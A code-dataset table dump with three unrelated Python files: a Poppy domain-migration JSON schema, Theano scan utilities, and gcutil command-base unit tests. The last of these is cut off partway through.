repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
obulpathi/poppy | poppy/transport/validators/schemas/domain_migration.py | 1 | 1645 | # Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from poppy.transport.validators import schema_base
class DomainMigrationServiceSchema(schema_base.SchemaBase):
'''JSON Schmema validation for /admin/provider/akamai/service'''
schema = {
'domain_migration': {
'POST': {
'type': 'object',
'additionalProperties': False,
'properties': {
'project_id': {
'type': 'string',
'required': True
},
'service_id': {
'type': 'string',
'required': True
},
'domain_name': {
'type': 'string',
'required': True,
'minLength': 3,
'maxLength': 253
},
'new_cert': {
'type': 'string',
'required': True
}
}
}
}
}
| apache-2.0 | 2,526,395,158,402,833,400 | 31.9 | 69 | 0.488754 | false |
nke001/attention-lvcsr | libs/Theano/theano/sandbox/scan_module/scan_utils.py | 1 | 16116 | """
This module provides utility functions for the Scan Op
See scan.py for details on scan
"""
from __future__ import print_function
__docformat__ = 'restructedtext en'
__authors__ = ("Razvan Pascanu "
"Frederic Bastien "
"James Bergstra "
"Pascal Lamblin "
"Arnaud Bergeron")
__copyright__ = "(c) 2010, Universite de Montreal"
__contact__ = "Razvan Pascanu <r.pascanu@gmail>"
import copy
import logging
import warnings
import numpy
from six.moves import xrange
import theano
from theano.compat import izip
from theano.compile.pfunc import rebuild_collect_shared
from theano import gof
from theano import tensor, scalar
from theano.tensor.basic import get_scalar_constant_value
# Logging function for sending warning or info
_logger = logging.getLogger('theano.scan_utils')
def expand(tensor_var, size):
"""
Given ``tensor_var``, a Theano tensor of shape (d1, d2, ..), this
function constructs a rval Theano tensor of shape (d1 + size, d2, ..)
filled with 0s, except the first d1 entries which are taken from
``tensor_var``, namely:
rval[:d1] = tensor_var
:param tensor_var: Theano tensor variable
:param size: int
"""
# Corner case that I might use in an optimization
if size == 0:
return tensor_var
shapes = [tensor_var.shape[x] for x in xrange(tensor_var.ndim)]
zeros_shape = [size + shapes[0]] + shapes[1:]
empty = tensor.zeros(zeros_shape,
dtype=tensor_var.dtype)
return tensor.set_subtensor(empty[:shapes[0]], tensor_var)
def to_list(ls):
"""
Converts ``ls`` to list if it is a tuple, or wraps ``ls`` into a list if
it is not a list already
"""
if isinstance(ls, (list, tuple)):
return list(ls)
else:
return [ls]
class until(object):
"""
Theano can end on a condition. In order to differentiate this condition
from the other outputs of scan, this class is used to wrap the condition
around it.
"""
def __init__(self, condition):
self.condition = tensor.as_tensor_variable(condition)
assert self.condition.ndim == 0
def get_updates_and_outputs(ls):
"""
Parses the list ``ls`` into outputs and updates. The semantics
of ``ls`` is defined by the constructive function of scan.
The elemets of ``ls`` are either a list of expressions representing the
outputs/states, a dictionary of updates or a condition.
"""
def is_list_outputs(elem):
if (isinstance(elem, (list, tuple)) and
all([isinstance(x, theano.Variable) for x in elem])):
return True
if isinstance(elem, theano.Variable):
return True
return False
def is_updates(elem):
if isinstance(elem, dict):
return True
# Dictionaries can be given as lists of tuples
if (isinstance(elem, (list, tuple)) and
all([isinstance(x, (list, tuple)) and len(x) == 2
for x in elem])):
return True
return False
def is_condition(elem):
return isinstance(elem, until)
if is_list_outputs(ls):
return None, to_list(ls), {}
if is_updates(ls):
return None, [], dict(ls)
if not isinstance(ls, (list, tuple)):
raise ValueError(('Scan can not parse the return value'
' of your constructive function given to scan'))
ls = list(ls)
deprecation_msg = ('The return value of the lambda function'
' has been restricted. you have to always return first the'
' outputs (if any), afterwards the updates (if any) and'
' at the end the condition')
error_msg = ('Scan can not parse the return value of your constructive '
'funtion given to scan')
if len(ls) == 2:
if is_list_outputs(ls[0]):
if is_updates(ls[1]):
return (None, to_list(ls[0]), dict(ls[1]))
elif is_condition(ls[1]):
return (ls[1].condition, to_list(ls[0]), {})
else:
raise ValueError(error_msg)
elif is_updates(ls[0]):
if is_outputs(ls[1]):
raise ValueError(deprecation_msg)
elif is_condition(ls[1]):
return (ls[1].condition, [], dict(ls[0]))
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
elif len(ls) == 3:
if is_outputs(ls[0]):
if is_updates(ls[1]):
if is_condition(ls[2]):
return (ls[2].condition, to_list(ls[0]), dict(ls[1]))
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
def clone(output, replace=None, strict=True, share_inputs=True):
"""
Function that allows replacing subgraphs of a computational
graph. It returns a copy of the initial subgraph with the corresponding
substitutions.
:type output: Theano Variables (or Theano expressions)
:param outputs: Theano expression that represents the computational
graph
:type replace: dict
:param replace: dictionary describing which subgraphs should be
replaced by what
:type share_inputs: bool
:param share_inputs: If True, use the same inputs (and shared variables)
as the original graph. If False, clone them. Note that cloned
shared variables still use the same underlying storage, so they
will always have the same value.
"""
inps, outs, other_stuff = rebuild_collect_shared(output,
[],
replace,
[],
strict,
share_inputs)
return outs
def canonical_arguments(sequences,
outputs_info,
non_sequences,
go_backwards,
n_steps):
"""
This re-writes the arguments obtained from scan into a more friendly
form for the scan_op.
Mainly it makes sure that arguments are given as lists of dictionaries,
and that the different fields of of a dictionary are set to default
value if the user has not provided any.
"""
states_info = to_list(outputs_info)
parameters = [tensor.as_tensor_variable(x) for x in to_list(non_sequences)]
inputs = []
if n_steps is not None:
negative_n_steps = tensor.lt(tensor.as_tensor_variable(n_steps), 0)
for input in to_list(sequences):
if not isinstance(input, dict):
nw_input = tensor.as_tensor_variable(input)
if go_backwards:
nw_input = nw_input[::-1]
if n_steps is not None:
nw_input = tensor.switch(negative_n_steps, nw_input[::-1],
nw_input)
inputs.append(tensor.as_tensor_variable(nw_input))
elif input.get('taps', True) is None:
nw_input = tensor.as_tensor_variable(input['input'])
if go_backwards:
nw_input = nw_input[::-1]
if n_steps is not None:
nw_input = tensor.switch(negative_n_steps, nw_input[::-1],
nw_input)
inputs.append(nw_input)
elif input.get('taps', None):
mintap = numpy.min(input['taps'])
maxtap = numpy.max(input['taps'])
orig_input = tensor.as_tensor_variable(input['input'])
if go_backwards:
orig_input = orig_input[::-1]
if n_steps is not None:
orig_input = tensor.switch(negative_n_steps, orig_input[::-1],
orig_input)
for k in input['taps']:
# We cut the sequence such that seq[i] to correspond to
# seq[i-k]
if maxtap < 0:
offset_max = abs(maxtap)
else:
offset_max = 0
if mintap < 0:
offset_min = abs(mintap)
else:
offset_min = 0
nw_input = orig_input
if maxtap == mintap and maxtap != 0:
if maxtap > 0:
nw_input = nw_input[maxtap:]
else:
nw_input = nw_input[:maxtap]
else:
st = k + offset_min
if maxtap > 0:
ed = - (maxtap + offset_min - st)
else:
ed = - (offset_min - st)
if ed != 0:
nw_input = nw_input[st:ed]
else:
nw_input = nw_input[st:]
inputs.append(nw_input)
else:
raise ValueError('Provided sequence makes no sense', str(input))
# Since we've added all sequences now we need to level them up based on
# n_steps or their different shapes
if n_steps is None:
if len(inputs) == 0:
# No information about the number of steps
raise ValueError('You need to provide either at least '
'one sequence over which scan should loop '
'or a number of steps for scan to loop. '
'Neither of the two had been provided !')
T = inputs[0].shape[0]
for input in inputs[1:]:
T = tensor.minimum(T, input.shape[0])
else:
T = abs(tensor.as_tensor(n_steps))
# Level up sequences
inputs = [input[:T] for input in inputs]
# wrap outputs info in a dictionary if they are not already in one
for i, state in enumerate(states_info):
if state is not None and not isinstance(state, dict):
states_info[i] = dict(initial=tensor.as_tensor_variable(state),
taps=[-1])
elif isinstance(state, dict):
if not state.get('initial', None) and state.get('taps', None):
raise ValueError(('If you are using slices of an output '
'you need to provide a initial state '
'for it'), state)
elif state.get('initial', None) and not state.get('taps', None):
# initial state but taps not provided
if 'taps' in state:
# explicitly provided a None for taps
_logger.warning(
('Output %s ( index %d) has a initial '
'state but taps is explicitly set to None '),
getattr(states_info[i]['initial'], 'name', 'None'), i)
states_info[i]['taps'] = [-1]
states_info[i]['initial'] = \
tensor.as_tensor_variable(state['initial'])
elif state.get('initial', None):
states_info[i]['initial'] = \
tensor.as_tensor_variable(state['initial'])
else:
# if a None is provided as the output info we replace it
# with an empty dict() to simplify handling
states_info[i] = dict()
return inputs, states_info, parameters, T
def infer_shape(outs, inputs, input_shapes):
'''
Compute the shape of the outputs given the shape of the inputs
of a theano graph.
We do it this way to avoid compiling the inner function just to get
the shape. Changes to ShapeFeature could require changes in this function.
'''
# We use a ShapeFeature because it has all the necessary logic
# inside. We don't use the full ShapeFeature interface, but we
# let it initialize itself with an empty fgraph, otherwise we will
# need to do it manually
for inp, inp_shp in izip(inputs, input_shapes):
if inp_shp is not None and len(inp_shp) != inp.ndim:
assert len(inp_shp) == inp.ndim
shape_feature = tensor.opt.ShapeFeature()
shape_feature.on_attach(theano.gof.FunctionGraph([], []))
# Initialize shape_of with the input shapes
for inp, inp_shp in izip(inputs, input_shapes):
shape_feature.set_shape(inp, inp_shp)
def local_traverse(out):
'''
Go back in the graph, from out, adding computable shapes to shape_of.
'''
if out in shape_feature.shape_of:
# Its shape is already known
return
elif out.owner is None:
# This is an input of the graph
shape_feature.init_r(out)
else:
# Recurse over inputs
for inp in out.owner.inputs:
if not inp in shape_feature.shape_of:
local_traverse(inp)
# shape_feature.on_import does not actually use an fgraph
# It will call infer_shape and set_shape appropriately
dummy_fgraph = None
shape_feature.on_import(dummy_fgraph, out.owner, reason="dummy")
ret = []
for o in outs:
local_traverse(o)
ret.append(shape_feature.shape_of[o])
return ret
def allocate_memory(T, y_info, y):
"""
Allocates memory for an output of scan.
:param T: scalar
Variable representing the number of steps scan will run
:param y_info: dict
Dictionary describing the output (more specifically describing shape
information for the output
:param y: Tensor variable
Expression describing the computation resulting in out entry of y.
It can be used to infer the shape of y
"""
if 'shape' in y_info:
return tensor.zeros([T, ] + list(y_info['shape']),
dtype=y.dtype)
else:
inputs = gof.graph.inputs([y])
ins_shapes = []
for inp in inputs:
in_shape = [inp.shape[k] for k in xrange(inp.ndim)]
ins_shapes.append(in_shape)
shape = infer_shape([y], inputs, ins_shapes)[0]
return tensor.zeros([T, ] + shape, dtype=y.dtype)
class ScanPermutation(gof.Op):
def __init__(self, mintap=0, inplace=False):
self.inplace = inplace
self.mintap = mintap
if inplace:
self.destroy_map = {0: [0]}
def __eq__(self, other):
return type(self) == type(other) and self.inplace == other.inplace
def __hash__(self):
return hash(type(self)) ^ hash(self.inplace)
def __str__(self):
if self.inplace:
return "scan_permutation{inplace}"
else:
return "scan_permutation"
def make_node(self, membuffer, index):
# index has to be a scalar
assert index.ndim == 0
# we neeed at least one dimension
assert membuffer.ndim > 0
return gof.Apply(self, [membuffer, index], [membuffer.type()])
def perform(self, node, inputs, outputs):
membuffer = inputs[0]
index = inputs[1] + self.mintap
out = outputs[0]
if index % membuffer.shape[0] == 0:
if self.inplace:
out[0] = membuffer
else:
out[0] = membuffer.copy()
else:
pos = index % membuffer.shape[0]
if outputs[0] is membuffer:
membuffer = membuffer.copy()
print(pos)
out[0][:membuffer.shape[0] - pos] = membuffer[pos:]
out[0][membuffer.shape[0] - pos:] = membuffer[:pos]
def R_op(self, inputs, eval_points):
if eval_points[0] is None:
return [None]
return self.make_node(eval_points[0], inputs[1]).outputs
def grad(self, inputs, grads):
pos = inputs[0].shape[0] - (inputs[1] % inputs[0].shape[0])
return self.make_node(grads[0], pos).outputs
| mit | 8,171,401,141,584,045,000 | 36.2194 | 79 | 0.548089 | false |
palladius/gcloud | packages/gcutil-1.7.1/lib/google_compute_engine/gcutil/command_base_test.py | 1 | 58035 | #!/usr/bin/python
#
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for the base command classes."""
from __future__ import with_statement
import path_initializer
path_initializer.InitializeSysPath()
import copy
import datetime
import os
import sys
import tempfile
from google.apputils import app
import gflags as flags
import unittest
from gcutil import command_base
from gcutil import gcutil_logging
from gcutil import mock_api
FLAGS = flags.FLAGS
class CommandBaseTest(unittest.TestCase):
class ListMockCommandBase(command_base.GoogleComputeListCommand):
"""A list mock command that specifies no default sort field."""
summary_fields = (('name', 'id'),
('id', 'number'),
('description', 'description'))
def __init__(self, name, flag_values):
super(CommandBaseTest.ListMockCommandBase, self).__init__(
name, flag_values)
def SetApi(self, api):
pass
def ListFunc(self):
def Func(project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'items': [{'description': 'Object C',
'id': 'projects/user/objects/my-object-c',
'kind': 'cloud#object',
'number': 123},
{'description': 'Object A',
'id': 'projects/user/objects/my-object-a',
'kind': 'cloud#object',
'number': 789},
{'description': 'Object B',
'id': 'projects/user/objects/my-object-b',
'kind': 'cloud#object',
'number': 456},
{'description': 'Object D',
'id': 'projects/user/objects/my-object-d',
'kind': 'cloud#object',
'number': 999}],
'kind': 'cloud#objectList'})
return Func
class ListMockCommand(ListMockCommandBase):
"""A list mock command that specifies a default sort field."""
default_sort_field = 'name'
def __init__(self, name, flag_values):
super(CommandBaseTest.ListMockCommand, self).__init__(name, flag_values)
class MockDetailCommand(command_base.GoogleComputeCommand):
detail_fields = (('name', 'id'),
('id', 'number'),
('description', 'description'),
('additional', 'moreStuff'))
def __init__(self, name, flag_values):
super(CommandBaseTest.MockDetailCommand, self).__init__(name, flag_values)
def SetApi(self, api):
pass
def Handle(self):
return {'description': 'Object C',
'id': 'projects/user/objects/my-object-c',
'kind': 'cloud#object',
'number': 123,
'moreStuff': 'foo'}
class MockSafetyCommand(command_base.GoogleComputeCommand):
safety_prompt = 'Take scary action'
def __init__(self, name, flag_values):
super(CommandBaseTest.MockSafetyCommand, self).__init__(name, flag_values)
def SetApi(self, api):
pass
def Handle(self):
pass
class MockSafetyCommandWithArgs(MockSafetyCommand):
safety_prompt = 'Act on'
def Handle(self, argument, arg2):
pass
class FakeExit(object):
"""A fake version of exit to capture exit status."""
def __init__(self):
self.__status__ = []
def __call__(self, value):
self.__status__.append(value)
def GetStatuses(self):
return self.__status__
class CaptureOutput(object):
def __init__(self):
self._capture_text = ''
# Purposefully name this 'write' to mock an output stream
# pylint: disable-msg=C6409
def write(self, text):
self._capture_text += text
# Purposefully name this 'flush' to mock an output stream
# pylint: disable-msg=C6409
def flush(self):
pass
def GetCapturedText(self):
return self._capture_text
class MockInput(object):
def __init__(self, input_string):
self._input_string = input_string
# Purposefully name this 'readline' to mock an input stream
# pylint: disable-msg=C6409
def readline(self):
return self._input_string
def ClearLogger(self):
for h in gcutil_logging.LOGGER.handlers:
gcutil_logging.LOGGER.removeHandler(h)
def test_PresentElement(self):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
flag_values.project = 'user'
flag_values.service_version = 'v1beta13'
command.SetFlags(flag_values)
self.assertEqual(
'user',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user'))
self.assertEqual(
'user',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user/'))
self.assertEqual('user', command._PresentElement('projects/user'))
self.assertEqual('user', command._PresentElement('projects/user/'))
self.assertEqual(
'standard-2-cpu',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user/machine-types/standard-2-cpu'))
self.assertEqual(
'standard-2-cpu',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user/machine-types/standard-2-cpu/'))
self.assertEqual(
'standard-2-cpu',
command._PresentElement('projects/user/machine-types/standard-2-cpu'))
self.assertEqual(
'standard-2-cpu',
command._PresentElement('projects/user/machine-types/standard-2-cpu/'))
self.assertEqual(
'foo/bar/baz',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user/shared-fate-zones/foo/bar/baz'))
self.assertEqual(
'foo/bar/baz',
command._PresentElement('projects/user/shared-fate-zones/foo/bar/baz'))
self.assertEqual('foo/bar/baz', command._PresentElement('foo/bar/baz'))
# Tests eliding feature
test_str = ('I am the very model of a modern Major-General. I\'ve '
'information vegetable, animal, and mineral. I know the kings '
'of England and quote the fights historical; from Marathon to '
'Waterloo in order categorical.')
self.assertEqual(
'I am the very model of a modern.. Waterloo in order categorical.',
command._PresentElement(test_str))
flag_values.long_values_display_format = 'full'
command.SetFlags(flag_values)
self.assertEqual(test_str, command._PresentElement(test_str))
def testDenormalizeProjectName(self):
denormalize = command_base.GoogleComputeCommand.DenormalizeProjectName
flag_values = flags.FlagValues()
flags.DEFINE_string('project',
None,
'Project Name',
flag_values=flag_values)
flags.DEFINE_string('project_id',
None,
'Obsolete Project Name',
flag_values=flag_values)
self.assertRaises(command_base.CommandError,
denormalize,
flag_values)
flag_values.project = 'project_collection/google'
self.assertRaises(command_base.CommandError,
denormalize,
flag_values)
flag_values.project = 'projects/google'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = '/google'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = 'google/'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = '/google/'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = '/projects/google'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = 'projects/google/'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = '/projects/google/'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project_id = 'my-obsolete-project-1'
flag_values.project = 'my-new-project-1'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'my-new-project-1')
self.assertEqual(flag_values.project_id, None)
flag_values.project_id = 'my-new-project-2'
flag_values.project = None
denormalize(flag_values)
self.assertEqual(flag_values.project, 'my-new-project-2')
self.assertEqual(flag_values.project_id, None)
flag_values.project_id = 'MyUppercaseProject-1'
flag_values.project = None
self.assertRaises(command_base.CommandError, denormalize, flag_values)
flag_values.project = 'MyUppercaseProject-2'
flag_values.project_id = None
self.assertRaises(command_base.CommandError, denormalize, flag_values)
def testDenormalizeResourceName(self):
denormalize = command_base.GoogleComputeCommand.DenormalizeResourceName
self.assertEqual('dual-cpu',
denormalize('projects/google/machine_types/dual-cpu'))
self.assertEqual('dual-cpu',
denormalize('/projects/google/machine_types/dual-cpu'))
self.assertEqual('dual-cpu',
denormalize('projects/google/machine_types/dual-cpu/'))
self.assertEqual('dual-cpu',
denormalize('/projects/google/machine_types/dual-cpu/'))
self.assertEqual('dual-cpu',
denormalize('//projects/google/machine_types/dual-cpu//'))
self.assertEqual('dual-cpu',
denormalize('dual-cpu'))
self.assertEqual('dual-cpu',
denormalize('/dual-cpu'))
self.assertEqual('dual-cpu',
denormalize('dual-cpu/'))
self.assertEqual('dual-cpu',
denormalize('/dual-cpu/'))
def _DoTestNormalizeResourceName(self, service_version):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'google'
flag_values.service_version = service_version
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
prefix = 'https://www.googleapis.com/compute/%s' % service_version
expected = '%s/projects/google/machine_types/dual-cpu' % prefix
self.assertEqual(
expected,
command.NormalizeResourceName('google', None, 'machine_types',
'dual-cpu'))
self.assertEqual(
expected,
command.NormalizeResourceName('google', None, 'machine_types',
'/dual-cpu'))
self.assertEqual(
expected,
command.NormalizeResourceName('google', None, 'machine_types',
'dual-cpu/'))
self.assertEqual(
expected,
command.NormalizeResourceName('google', None, 'machine_types',
'/dual-cpu/'))
self.assertEqual(
expected,
command.NormalizeResourceName(
'google',
None,
'machine_types',
'projects/google/machine_types/dual-cpu'))
self.assertEqual(
expected,
command.NormalizeResourceName(
'google',
None,
'machine_types',
'/projects/google/machine_types/dual-cpu'))
self.assertEqual(
expected,
command.NormalizeResourceName(
'google',
None,
'machine_types',
'projects/google/machine_types/dual-cpu/'))
self.assertEqual(
expected,
command.NormalizeResourceName(
'google',
None,
'machine_types',
'/projects/google/machine_types/dual-cpu/'))
self.assertEqual(
'%s/projects/google/kernels/default' % prefix,
command.NormalizeResourceName(
'my-project',
None,
'kernels',
'projects/google/kernels/default'))
def testNormalizeResourceName(self):
for version in command_base.SUPPORTED_VERSIONS:
self._DoTestNormalizeResourceName(version)
def testNormalizeScopedResourceName(self):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'my-project'
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
# Validate scope is ignored downlevel
flag_values.service_version = 'v1beta13'
prefix = 'https://www.googleapis.com/compute/v1beta13'
expected = '%s/projects/my-project/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizeResourceName('my-project', 'scope', 'objects',
'foo-bar'))
# Validate scope is expected in v1beta14 and above
flag_values.service_version = 'v1beta14'
prefix = 'https://www.googleapis.com/compute/v1beta14'
expected = '%s/projects/my-project/scope/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizeResourceName('my-project', 'scope', 'objects',
'foo-bar'))
# Validate helper wrappers
expected = '%s/projects/my-project/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizeTopLevelResourceName('my-project', 'objects',
'foo-bar'))
expected = '%s/projects/my-project/global/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizeGlobalResourceName('my-project', 'objects',
'foo-bar'))
expected = '%s/projects/my-project/zones/zone-a/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizePerZoneResourceName('my-project', 'zone-a', 'objects',
'foo-bar'))
def testFlattenToDict(self):
class TestClass(command_base.GoogleComputeCommand):
fields = (('name', 'id'),
('simple', 'path.to.object'),
('multiple', 'more.elements'),
('multiple', 'even_more.elements'),
('repeated', 'things'),
('long', 'l'),
('does not exist', 'dne'),
('partial match', 'path.to.nowhere'),
)
data = {'id': ('https://www.googleapis.com/compute/v1beta1/' +
'projects/test/object/foo'),
'path': {'to': {'object': 'bar'}},
'more': [{'elements': 'a'}, {'elements': 'b'}],
'even_more': [{'elements': 800}, {'elements': 800}],
'things': [1, 2, 3],
'l': 'n' * 80}
expected_result = ['foo', 'bar', 'a,b', '800,800', '1,2,3',
'%s..%s' % ('n' * 31, 'n' * 31), '', '']
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'test'
test_class = TestClass('foo', flag_values)
test_class.SetFlags(flag_values)
flattened = test_class._FlattenObjectToList(data, test_class.fields)
self.assertEquals(flattened, expected_result)
def testFlattenToDictWithMultipleTargets(self):
class TestClass(command_base.GoogleComputeCommand):
fields = (('name', ('name', 'id')),
('simple', ('path.to.object', 'foo')),
('multiple', 'more.elements'),
('multiple', 'even_more.elements'),
('repeated', 'things'),
('long', ('l', 'longer')),
('does not exist', 'dne'),
('partial match', 'path.to.nowhere'),
)
data = {'name': ('https://www.googleapis.com/compute/v1beta1/' +
'projects/test/object/foo'),
'path': {'to': {'object': 'bar'}},
'more': [{'elements': 'a'}, {'elements': 'b'}],
'even_more': [{'elements': 800}, {'elements': 800}],
'things': [1, 2, 3],
'longer': 'n' * 80}
expected_result = ['foo', 'bar', 'a,b', '800,800', '1,2,3',
'%s..%s' % ('n' * 31, 'n' * 31), '', '']
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'test'
test_class = TestClass('foo', flag_values)
test_class.SetFlags(flag_values)
flattened = test_class._FlattenObjectToList(data, test_class.fields)
self.assertEquals(flattened, expected_result)
def testPositionArgumentParsing(self):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flags.DEFINE_string('mockflag',
'wrong_mock_flag',
'Mock Flag',
flag_values=flag_values)
def Handle(self, arg1, arg2, arg3):
pass
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
expected_arg1 = 'foo'
expected_arg2 = 'bar'
expected_arg3 = 'baz'
expected_flagvalue = 'wow'
command_line = ['mock_command', expected_arg1, expected_arg2,
expected_arg3, '--mockflag=' + expected_flagvalue]
# Verify the positional argument parser correctly identifies the parameters
# and flags.
result = command._ParseArgumentsAndFlags(flag_values, command_line)
self.assertEqual(result[0], expected_arg1)
self.assertEqual(result[1], expected_arg2)
self.assertEqual(result[2], expected_arg3)
self.assertEqual(flag_values.mockflag, expected_flagvalue)
def testErroneousKeyWordArgumentParsing(self):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flags.DEFINE_integer('mockflag',
10,
'Mock Flag',
flag_values=flag_values,
lower_bound=0)
def Handle(self, arg1, arg2, arg3):
pass
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
# Ensures that a type mistmatch for a keyword argument causes a
# CommandError to be raised.
bad_values = [-100, -2, 0.2, .30, 100.1]
for val in bad_values:
command_line = ['mock_command', '--mockflag=%s' % val]
self.assertRaises(command_base.CommandError,
command._ParseArgumentsAndFlags,
flag_values, command_line)
# Ensures that passing a nonexistent keyword argument also causes
# a CommandError to be raised.
command_line = ['mock_command', '--nonexistent_flag=boo!']
self.assertRaises(command_base.CommandError,
command._ParseArgumentsAndFlags,
flag_values, command_line)
def testSafetyPromptYes(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_command']
command = CommandBaseTest.MockSafetyCommand('mock_command', flag_values)
args = command._ParseArgumentsAndFlags(flag_values, command_line)
command.SetFlags(flag_values)
mock_output = mock_api.MockOutput()
mock_input = mock_api.MockInput('Y\n\r')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._HandleSafetyPrompt(args)
self.assertEqual(mock_output.GetCapturedText(),
'Take scary action? [y/N]\n>>> ')
self.assertEqual(result, True)
sys.stdin = oldin
sys.stdout = oldout
def testSafetyPromptWithArgsYes(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_cmd', 'arg1', 'arg2']
command = CommandBaseTest.MockSafetyCommandWithArgs('mock_cmd', flag_values)
args = command._ParseArgumentsAndFlags(flag_values, command_line)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('Y\n\r')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._HandleSafetyPrompt(args)
self.assertEqual(mock_output.GetCapturedText(),
'Act on arg1, arg2? [y/N]\n>>> ')
self.assertEqual(result, True)
sys.stdin = oldin
sys.stdout = oldout
def testSafetyPromptMissingArgs(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_cmd', 'arg1']
command = CommandBaseTest.MockSafetyCommandWithArgs('mock_cmd', flag_values)
command_base.sys.exit = CommandBaseTest.FakeExit()
sys.stderr = CommandBaseTest.CaptureOutput()
gcutil_logging.SetupLogging()
self.assertRaises(command_base.CommandError,
command._ParseArgumentsAndFlags,
flag_values, command_line)
def testSafetyPromptExtraArgs(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_cmd', 'arg1', 'arg2', 'arg3']
command = CommandBaseTest.MockSafetyCommandWithArgs('mock_cmd', flag_values)
command_base.sys.exit = CommandBaseTest.FakeExit()
sys.stderr = CommandBaseTest.CaptureOutput()
gcutil_logging.SetupLogging()
self.assertRaises(command_base.CommandError,
command._ParseArgumentsAndFlags,
flag_values, command_line)
def testSafetyPromptNo(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_command']
command = CommandBaseTest.MockSafetyCommand('mock_command', flag_values)
args = command._ParseArgumentsAndFlags(flag_values, command_line)
command.SetFlags(flag_values)
mock_output = mock_api.MockOutput()
mock_input = mock_api.MockInput('garbage\n\r')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._HandleSafetyPrompt(args)
self.assertEqual(mock_output.GetCapturedText(),
'Take scary action? [y/N]\n>>> ')
self.assertEqual(result, False)
sys.stdin = oldin
sys.stdout = oldout
def testSafetyPromptForce(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_command', '--force']
command = CommandBaseTest.MockSafetyCommand('mock_command', flag_values)
args = command._ParseArgumentsAndFlags(flag_values, command_line)
command.SetFlags(flag_values)
mock_output = mock_api.MockOutput()
oldout = sys.stdout
sys.stdout = mock_output
result = command._HandleSafetyPrompt(args)
sys.stdout = oldout
self.assertEqual(result, True)
self.assertEqual(mock_output.GetCapturedText(), '')
def testPromptForEntryWithZeroItems(self):
class MockCollectionApi(object):
def list(self, project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'kind': 'compute#collectionList',
'id': 'projects/p/collection',
'selfLink':
'https://www.googleapis.com/compute/v1/projects/p/collection'
})
